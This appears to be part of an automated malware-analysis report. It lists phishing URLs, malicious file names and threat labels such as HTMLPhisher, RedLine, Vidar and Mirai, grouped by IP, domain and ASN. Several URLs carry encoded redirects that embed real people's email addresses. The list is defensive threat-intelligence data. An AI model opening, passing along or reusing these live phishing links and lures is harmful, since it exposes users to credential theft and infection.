239.255.255.250	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MTAxOTIyLCJtZXNzYWdlX2lkIjoiMGd4d3poYXc3czloeGZoZWNuNjNuYnFwIzg0YjRlN2VjLTdhZjUtNDU5Yi1hNTYxLWE1ZmVlMTE3NTllNiIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjM3OTIyLCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtbWVzc2FuZ2VyLnJkb2NtZ2xvYmFsLmNvbS9kb2NzL2luZGV4LnBocD9tYWlsPSUyMGphbWVzLmZheUBjb3VudHluYXRpb25hbGJhbmsuY29tJnBhdGhzPWFib3ZlJmxpbms9RmF4X091dGxvb2siLCJpbmRpdmlkdWFsX2lkIjoiNDA4YWI4OGRlY2JmNDFjMjRhYTZhMDRlOWU1OWMzZDAifQ.i-tkK1Lnys-MM487ot1MrSYQb6ExLgZNRQbgsH8B2K0	Get hash	malicious	Captcha Phish	Browse
	http://relevanteduofficelogin.relevantedu.xyz	Get hash	malicious	HTMLPhisher	Browse
	Settlement DOL 08262024 - Victoria Brignon - Reference #27224675-2722934.html	Get hash	malicious	HTMLPhisher	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	https://downloads.locklizard.com/SafeguardPDFViewer_v3.exe	Get hash	malicious	Unknown	Browse
	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MTM3MzAwLCJtZXNzYWdlX2lkIjoiMGd5MGJnNjBqOTJwcmNuZjhhNHNxYWpwIzZjY2RmYjMyLWJiNzgtNGQwNC1hYWYwLTg3MjdkMTg4MjZlMyIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjczMzAwLCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtbWVzc2FuZ2VyLnJkb2NtZ2xvYmFsLmNvbS9kb2NzL2luZGV4LnBocD9tYWlsPSUyMGhiYXJ0aGxvd0BzZWN1cnVzdGVjaG5vbG9naWVzLmNvbSZwYXRocz1hYm92ZSZsaW5rPUZheF9PdXRsb29rIiwiaW5kaXZpZHVhbF9pZCI6IjQ0NDY4NzI5YzA1N2Q5ZDJjYzNiYjZlOTc3NDg3MzUyIn0.AryFGbNWOut6hGg1x_WBQ4QL5QU_wggDk6q2PUj7rNI	Get hash	malicious	Captcha Phish	Browse
	https://srmcorp.tecuidoc.com/?PSZlk=ViP	Get hash	malicious	HTMLPhisher	Browse
	gq83mrprwy.exe	Get hash	malicious	Xmrig	Browse
	http://url9212.charteredarena.org/ls/click?upn=u001.kjyKVeM-2Fb1rGOGHOnr1jOBOY3L3JqbNTsl6-2FG2Q28FBbMvScULOdn5hj4fYmOT1gSvNV_eFFQU5nW4TX33oYM-2FvMZ4H4nrQnEbWOt7nYb46lhhradIe8kQ30nH41Yux5-2ByqjXVzNOeRGeH70TSwGBG-2FsCyfS-2BqFuy7r7yA-2BMVhshonhVyPepAGojJAWOStPfHQEXVhS9QapMz6-2FLiLkIDitr77rwl6cV3-2BOVbi0qMHcpubANPDna-2BAJRWKHhsn2J-2BHsm2h-2B1n0PvhIvECyeSGKW-2FdmoYnwMnfXv-2F0VHDQdAF4JyTklFAWOdWvqmq9QaL29M0Lqvm9PdkAaDucmiv1yWhzGJ-2FSlIlic4yMaUzKSM2tXbVKRT-2BcTJHrLGjV82z-2BxMi-2FPWDvS9vQSeDz0xjN0gvzYnMQqfZiJ7fdvgXYvIvcGvziknMmHkQ7sUHmtLIGr6gsv-2FI2qInnZxnaJ1Ow7w3sMmgc-2FLcAEaJe5QnWJ5qez1H3mc7J1f4VLI4PyjCxv7syUPC13rDkwMklRiABfKztYQ3n9LW3FeH4hgMGYJgJovBs-2FKlVUipIzO24iLrfZpg-2FS6-2Fvp-2BRnBXh4Gim5LY7NxdelnIZomgKJ8r1gxfM163jd5ekCcUFZcZJn8BUr-2FrBOq6vvyf5Ut44ln9oAHSsmy2ecvwUHxQ-2Bo0mJA2r9a8FeSV3APNVBZowUa1ZGpOSvbZRLc6uZxrFl3fSWY774fhm-2Fl3qG7s-2BRWj2lGIHB3NEqH1X520Diu5Le7soeKgWoeaLCSrT5v7lt-2B7XayjukGYP4Yz5jSqZD2gXDxl443sgS6brqBQ3LKHfRN7s2NZ-2F6nWblHw6-2BLG-2FTduGCq0lMfhnVz7mFWLyKhJHvoE3C2dN6qv1-2FpHnRcIGopoYVEdZ-2F182c7Ll7OsxlzgTKemGKriHFjxwOhwkIoHVdgcJWnLS8-3D	Get hash	malicious	Unknown	Browse
	https://runrun.it/share/form/0GZMCgHSxRh4PBOM	Get hash	malicious	HTMLPhisher	Browse
152.199.4.44	https://4yu76uyd4.best/ccon/	Get hash	malicious	Unknown	Browse
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fmyapps.microsoft.com%252Fsignin%252F08558f59-9161-41fc-88b3-f0434087a79c%253FtenantId%253D258ac4e4-146a-411e-9dc8-79a9e12fd6da%26data%3D05%257C01%257Cgary.fabrizio1%2540Service.wipro.com%257C8a0e1c61209e469846ba08dbe05e2370%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638350467206547446%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C3000%257C%257C%257C%26sdata%3Dp0jrjFUb%252Fusi2RID%252FGIlCE82AM9dEDuVAB4PHdDC1%252F4%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse
	https://site-stlp3.powerappsportals.com/	Get hash	malicious	Unknown	Browse
	https://flicker-candle-sunspot.glitch.me/wond276816auing.html	Get hash	malicious	Unknown	Browse
	https://lide.alosalca.fun/highbox#joeblow@xyz.com	Get hash	malicious	HTMLPhisher	Browse
	https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1	Get hash	malicious	Unknown	Browse
	https://shining-melodic-magnesium.glitch.me/rvicendDev.html	Get hash	malicious	Unknown	Browse
	https://pub-839300a9c6054ed7b1c425122a9dd984.r2.dev/doc.html	Get hash	malicious	HTMLPhisher	Browse
	https://cloudflare-ipfs.com/ipfs/bafkreiffz46tyqvifmyhjcdbynucd4duurmznmxaorlfjuwzovmtocshje	Get hash	malicious	HTMLPhisher	Browse
	https://ken.fnh.temporary.site/wp-includes/sitemaps/update	Get hash	malicious	Unknown	Browse
185.216.70.216	Chase Bank ACH.htm	Get hash	malicious	Unknown	Browse
	Encrypted_PaymentAdvice_Reference.html	Get hash	malicious	HTMLPhisher	Browse
	56dcdbe-9468514212.html	Get hash	malicious	Unknown	Browse
	EncryptedPaymentAdviceReference.html	Get hash	malicious	Unknown	Browse
	Invoice65952.html	Get hash	malicious	Unknown	Browse
	EncryptedPaymentAdviceReference.html	Get hash	malicious	Unknown	Browse
	EncryptedPaymentAdviceReference.html	Get hash	malicious	Unknown	Browse
	Lettre_virement29638.htm	Get hash	malicious	Unknown	Browse
	EncryptedPaymentAdviceReference.htm	Get hash	malicious	Unknown	Browse
	EncryptedPaymentAdviceReference.htm	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bc1qusz5l7h87pd2v6sv45nz82s.com	Chase Bank ACH.htm	Get hash	malicious	Unknown	Browse	185.216.70.6
cs1100.wpc.omegacdn.net	https://click.pstmrk.it/3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3Yffz	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://click.pstmrk.it/3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3Yffz	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://4yu76uyd4.best/ccon/	Get hash	malicious	Unknown	Browse	152.199.4.44
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fmyapps.microsoft.com%252Fsignin%252F08558f59-9161-41fc-88b3-f0434087a79c%253FtenantId%253D258ac4e4-146a-411e-9dc8-79a9e12fd6da%26data%3D05%257C01%257Cgary.fabrizio1%2540Service.wipro.com%257C8a0e1c61209e469846ba08dbe05e2370%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638350467206547446%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C3000%257C%257C%257C%26sdata%3Dp0jrjFUb%252Fusi2RID%252FGIlCE82AM9dEDuVAB4PHdDC1%252F4%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	152.199.4.44
	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4MzE4LCJtZXNzYWdlX2lkIjoiMGd4dnAwdGZzeWpiNm4yamRiMDRuYWd5IzcyNWE1YTc5LTgxYzQtNGM0Yy1iNmI1LTdmMTY0MTM2ZTE2NCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjI0MzE4LCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtLmJyYWRlbnRvbmNjLmluZm8vP2VvdmlldWJyJnFyYz1yZW5lZS5zY2h3YXJ0ekBxci5jb20uYXUiLCJpbmRpdmlkdWFsX2lkIjoiODdiZTY3MTdlZjJmMThjYzI3YmMyMWQ4OTJhY2Q2NzAifQ.iusDS7mld4iiq9DDY82R1MJ9ToHxmMDW3SMbDENZOZQ	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://site-stlp3.powerappsportals.com/	Get hash	malicious	Unknown	Browse	152.199.4.44
	https://flicker-candle-sunspot.glitch.me/wond276816auing.html	Get hash	malicious	Unknown	Browse	152.199.4.44
	https://lide.alosalca.fun/highbox#joeblow@xyz.com	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1	Get hash	malicious	Unknown	Browse	152.199.4.44
	https://j4tpu.bpmsafelink.com/c/0aR4TTLkLUqplUI-2TrhdA	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
bc1q2a22gd79umarrlvhudct2v5.com	Chase Bank ACH.htm	Get hash	malicious	Unknown	Browse	185.216.70.216
google.com	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MTAxOTIyLCJtZXNzYWdlX2lkIjoiMGd4d3poYXc3czloeGZoZWNuNjNuYnFwIzg0YjRlN2VjLTdhZjUtNDU5Yi1hNTYxLWE1ZmVlMTE3NTllNiIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjM3OTIyLCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtbWVzc2FuZ2VyLnJkb2NtZ2xvYmFsLmNvbS9kb2NzL2luZGV4LnBocD9tYWlsPSUyMGphbWVzLmZheUBjb3VudHluYXRpb25hbGJhbmsuY29tJnBhdGhzPWFib3ZlJmxpbms9RmF4X091dGxvb2siLCJpbmRpdmlkdWFsX2lkIjoiNDA4YWI4OGRlY2JmNDFjMjRhYTZhMDRlOWU1OWMzZDAifQ.i-tkK1Lnys-MM487ot1MrSYQb6ExLgZNRQbgsH8B2K0	Get hash	malicious	Captcha Phish	Browse	142.250.217.196
	http://relevanteduofficelogin.relevantedu.xyz	Get hash	malicious	HTMLPhisher	Browse	142.250.217.196
	Settlement DOL 08262024 - Victoria Brignon - Reference #27224675-2722934.html	Get hash	malicious	HTMLPhisher	Browse	142.250.64.164
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	192.178.50.36
	https://downloads.locklizard.com/SafeguardPDFViewer_v3.exe	Get hash	malicious	Unknown	Browse	142.250.64.196
	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MTM3MzAwLCJtZXNzYWdlX2lkIjoiMGd5MGJnNjBqOTJwcmNuZjhhNHNxYWpwIzZjY2RmYjMyLWJiNzgtNGQwNC1hYWYwLTg3MjdkMTg4MjZlMyIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjczMzAwLCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtbWVzc2FuZ2VyLnJkb2NtZ2xvYmFsLmNvbS9kb2NzL2luZGV4LnBocD9tYWlsPSUyMGhiYXJ0aGxvd0BzZWN1cnVzdGVjaG5vbG9naWVzLmNvbSZwYXRocz1hYm92ZSZsaW5rPUZheF9PdXRsb29rIiwiaW5kaXZpZHVhbF9pZCI6IjQ0NDY4NzI5YzA1N2Q5ZDJjYzNiYjZlOTc3NDg3MzUyIn0.AryFGbNWOut6hGg1x_WBQ4QL5QU_wggDk6q2PUj7rNI	Get hash	malicious	Captcha Phish	Browse	142.250.217.164
	https://srmcorp.tecuidoc.com/?PSZlk=ViP	Get hash	malicious	HTMLPhisher	Browse	142.250.217.196
	gq83mrprwy.exe	Get hash	malicious	Xmrig	Browse	142.250.64.196
	http://url9212.charteredarena.org/ls/click?upn=u001.kjyKVeM-2Fb1rGOGHOnr1jOBOY3L3JqbNTsl6-2FG2Q28FBbMvScULOdn5hj4fYmOT1gSvNV_eFFQU5nW4TX33oYM-2FvMZ4H4nrQnEbWOt7nYb46lhhradIe8kQ30nH41Yux5-2ByqjXVzNOeRGeH70TSwGBG-2FsCyfS-2BqFuy7r7yA-2BMVhshonhVyPepAGojJAWOStPfHQEXVhS9QapMz6-2FLiLkIDitr77rwl6cV3-2BOVbi0qMHcpubANPDna-2BAJRWKHhsn2J-2BHsm2h-2B1n0PvhIvECyeSGKW-2FdmoYnwMnfXv-2F0VHDQdAF4JyTklFAWOdWvqmq9QaL29M0Lqvm9PdkAaDucmiv1yWhzGJ-2FSlIlic4yMaUzKSM2tXbVKRT-2BcTJHrLGjV82z-2BxMi-2FPWDvS9vQSeDz0xjN0gvzYnMQqfZiJ7fdvgXYvIvcGvziknMmHkQ7sUHmtLIGr6gsv-2FI2qInnZxnaJ1Ow7w3sMmgc-2FLcAEaJe5QnWJ5qez1H3mc7J1f4VLI4PyjCxv7syUPC13rDkwMklRiABfKztYQ3n9LW3FeH4hgMGYJgJovBs-2FKlVUipIzO24iLrfZpg-2FS6-2Fvp-2BRnBXh4Gim5LY7NxdelnIZomgKJ8r1gxfM163jd5ekCcUFZcZJn8BUr-2FrBOq6vvyf5Ut44ln9oAHSsmy2ecvwUHxQ-2Bo0mJA2r9a8FeSV3APNVBZowUa1ZGpOSvbZRLc6uZxrFl3fSWY774fhm-2Fl3qG7s-2BRWj2lGIHB3NEqH1X520Diu5Le7soeKgWoeaLCSrT5v7lt-2B7XayjukGYP4Yz5jSqZD2gXDxl443sgS6brqBQ3LKHfRN7s2NZ-2F6nWblHw6-2BLG-2FTduGCq0lMfhnVz7mFWLyKhJHvoE3C2dN6qv1-2FpHnRcIGopoYVEdZ-2F182c7Ll7OsxlzgTKemGKriHFjxwOhwkIoHVdgcJWnLS8-3D	Get hash	malicious	Unknown	Browse	142.250.64.196
	https://runrun.it/share/form/0GZMCgHSxRh4PBOM	Get hash	malicious	HTMLPhisher	Browse	172.217.165.206
cdnjs.cloudflare.com	Settlement DOL 08262024 - Victoria Brignon - Reference #27224675-2722934.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://householdshop.club/	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://cleverchoice.com.au	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://cleverchoice.com.au	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://cleverchoice.com.au	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://marinatitle.com	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://uporniacomnuvidx.z13.web.core.windows.net/index.html	Get hash	malicious	TechSupportScam	Browse	104.17.25.14
	https://purexxfilmsjoybear.z13.web.core.windows.net/index.html	Get hash	malicious	TechSupportScam	Browse	104.17.24.14
	https://jpmanysexcomvistsxx.z13.web.core.windows.net/index.html	Get hash	malicious	TechSupportScam	Browse	104.17.25.14
	https://lide.alosalca.fun/highbox#joeblow@xyz.com	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Settlement DOL 08262024 - Victoria Brignon - Reference #27224675-2722934.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://url9212.charteredarena.org/ls/click?upn=u001.kjyKVeM-2Fb1rGOGHOnr1jOBOY3L3JqbNTsl6-2FG2Q28FBbMvScULOdn5hj4fYmOT1gSvNV_eFFQU5nW4TX33oYM-2FvMZ4H4nrQnEbWOt7nYb46lhhradIe8kQ30nH41Yux5-2ByqjXVzNOeRGeH70TSwGBG-2FsCyfS-2BqFuy7r7yA-2BMVhshonhVyPepAGojJAWOStPfHQEXVhS9QapMz6-2FLiLkIDitr77rwl6cV3-2BOVbi0qMHcpubANPDna-2BAJRWKHhsn2J-2BHsm2h-2B1n0PvhIvECyeSGKW-2FdmoYnwMnfXv-2F0VHDQdAF4JyTklFAWOdWvqmq9QaL29M0Lqvm9PdkAaDucmiv1yWhzGJ-2FSlIlic4yMaUzKSM2tXbVKRT-2BcTJHrLGjV82z-2BxMi-2FPWDvS9vQSeDz0xjN0gvzYnMQqfZiJ7fdvgXYvIvcGvziknMmHkQ7sUHmtLIGr6gsv-2FI2qInnZxnaJ1Ow7w3sMmgc-2FLcAEaJe5QnWJ5qez1H3mc7J1f4VLI4PyjCxv7syUPC13rDkwMklRiABfKztYQ3n9LW3FeH4hgMGYJgJovBs-2FKlVUipIzO24iLrfZpg-2FS6-2Fvp-2BRnBXh4Gim5LY7NxdelnIZomgKJ8r1gxfM163jd5ekCcUFZcZJn8BUr-2FrBOq6vvyf5Ut44ln9oAHSsmy2ecvwUHxQ-2Bo0mJA2r9a8FeSV3APNVBZowUa1ZGpOSvbZRLc6uZxrFl3fSWY774fhm-2Fl3qG7s-2BRWj2lGIHB3NEqH1X520Diu5Le7soeKgWoeaLCSrT5v7lt-2B7XayjukGYP4Yz5jSqZD2gXDxl443sgS6brqBQ3LKHfRN7s2NZ-2F6nWblHw6-2BLG-2FTduGCq0lMfhnVz7mFWLyKhJHvoE3C2dN6qv1-2FpHnRcIGopoYVEdZ-2F182c7Ll7OsxlzgTKemGKriHFjxwOhwkIoHVdgcJWnLS8-3D	Get hash	malicious	Unknown	Browse	1.1.1.1
	Dragons Dogma 2 v1.0 Plus 36 Trainer.exe	Get hash	malicious	Unknown	Browse	104.21.85.118
	Dragons Dogma 2 v1.0 Plus 36 Trainer.exe	Get hash	malicious	Unknown	Browse	104.21.85.118
	https://gelw.nalverd.com/AvGEoxV/	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	Packing List PDF.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	POattach.html	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	factura - ztcpyqiqtfiewxjhesna.msi	Get hash	malicious	Unknown	Browse	104.18.32.137
CLOUDCOMPUTINGDE	https://www.ne16.com/t/4177044/70602841/2927387/1/124665/?f8785874=aHR0cHM6Ly93b29kLWRlY2sub3JnL3BkZi85SWRac1p5aTJEeWh3ZUcvYTFmM2IxODIyN2RiNTc4NjIzOGE2ZTc0NTE3YWQ4MDEvWEM4YXAvYTFmM2IxODIyN2RiNTc4NjIzOGE2ZTc0NTE3YWQ4MDEvWTJOc1lYSmxRR0psYkd4d1lYSjBibVZ5YzJsdVl5NWpiMjA9	Get hash	malicious	HTMLPhisher	Browse	185.216.70.3
	39219551856425239229659018183199459894710784074224159047793937414398083.exe	Get hash	malicious	GuLoader	Browse	185.216.71.95
	Chase Bank ACH.htm	Get hash	malicious	Unknown	Browse	185.216.70.216
	Encrypted_PaymentAdvice_Reference.html	Get hash	malicious	HTMLPhisher	Browse	185.216.70.216
	http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=	Get hash	malicious	Unknown	Browse	185.216.70.4
	VtMI9Eirot.elf	Get hash	malicious	Unknown	Browse	185.216.70.169
	Yu9EYARrsZ.elf	Get hash	malicious	Mirai	Browse	185.216.70.88
	10l8wFuMZV.elf	Get hash	malicious	Mirai	Browse	185.216.70.88
	zNkF2ekeds.elf	Get hash	malicious	Mirai	Browse	185.216.70.88
	Se6e7NboAD.elf	Get hash	malicious	Mirai	Browse	185.216.70.88
EDGECASTUS	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MTAxOTIyLCJtZXNzYWdlX2lkIjoiMGd4d3poYXc3czloeGZoZWNuNjNuYnFwIzg0YjRlN2VjLTdhZjUtNDU5Yi1hNTYxLWE1ZmVlMTE3NTllNiIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjM3OTIyLCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtbWVzc2FuZ2VyLnJkb2NtZ2xvYmFsLmNvbS9kb2NzL2luZGV4LnBocD9tYWlsPSUyMGphbWVzLmZheUBjb3VudHluYXRpb25hbGJhbmsuY29tJnBhdGhzPWFib3ZlJmxpbms9RmF4X091dGxvb2siLCJpbmRpdmlkdWFsX2lkIjoiNDA4YWI4OGRlY2JmNDFjMjRhYTZhMDRlOWU1OWMzZDAifQ.i-tkK1Lnys-MM487ot1MrSYQb6ExLgZNRQbgsH8B2K0	Get hash	malicious	Captcha Phish	Browse	93.184.215.14
	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MTM3MzAwLCJtZXNzYWdlX2lkIjoiMGd5MGJnNjBqOTJwcmNuZjhhNHNxYWpwIzZjY2RmYjMyLWJiNzgtNGQwNC1hYWYwLTg3MjdkMTg4MjZlMyIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjczMzAwLCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtbWVzc2FuZ2VyLnJkb2NtZ2xvYmFsLmNvbS9kb2NzL2luZGV4LnBocD9tYWlsPSUyMGhiYXJ0aGxvd0BzZWN1cnVzdGVjaG5vbG9naWVzLmNvbSZwYXRocz1hYm92ZSZsaW5rPUZheF9PdXRsb29rIiwiaW5kaXZpZHVhbF9pZCI6IjQ0NDY4NzI5YzA1N2Q5ZDJjYzNiYjZlOTc3NDg3MzUyIn0.AryFGbNWOut6hGg1x_WBQ4QL5QU_wggDk6q2PUj7rNI	Get hash	malicious	Captcha Phish	Browse	93.184.215.14
	file.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	file.exe	Get hash	malicious	Unknown	Browse	152.195.19.97
	https://usigroups-my.sharepoint.com/:o:/p/js/Es3HdUJZlbVJngCJE-Z7JCYBUTZvd1ZCMQwZhhlQoy_hDw?e=mT2aQm	Get hash	malicious	HTMLPhisher	Browse	152.195.19.97
	https://4yu76uyd4.best/ccon/	Get hash	malicious	Unknown	Browse	152.199.4.44
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fmyapps.microsoft.com%252Fsignin%252F08558f59-9161-41fc-88b3-f0434087a79c%253FtenantId%253D258ac4e4-146a-411e-9dc8-79a9e12fd6da%26data%3D05%257C01%257Cgary.fabrizio1%2540Service.wipro.com%257C8a0e1c61209e469846ba08dbe05e2370%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638350467206547446%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C3000%257C%257C%257C%26sdata%3Dp0jrjFUb%252Fusi2RID%252FGIlCE82AM9dEDuVAB4PHdDC1%252F4%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse	152.195.19.97
	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4MzE4LCJtZXNzYWdlX2lkIjoiMGd4dnAwdGZzeWpiNm4yamRiMDRuYWd5IzcyNWE1YTc5LTgxYzQtNGM0Yy1iNmI1LTdmMTY0MTM2ZTE2NCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjI0MzE4LCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtLmJyYWRlbnRvbmNjLmluZm8vP2VvdmlldWJyJnFyYz1yZW5lZS5zY2h3YXJ0ekBxci5jb20uYXUiLCJpbmRpdmlkdWFsX2lkIjoiODdiZTY3MTdlZjJmMThjYzI3YmMyMWQ4OTJhY2Q2NzAifQ.iusDS7mld4iiq9DDY82R1MJ9ToHxmMDW3SMbDENZOZQ	Get hash	malicious	HTMLPhisher	Browse	152.195.19.97
	https://marinatitle.com	Get hash	malicious	Unknown	Browse	152.199.24.163
	https://site-stlp3.powerappsportals.com/	Get hash	malicious	Unknown	Browse	152.199.4.44
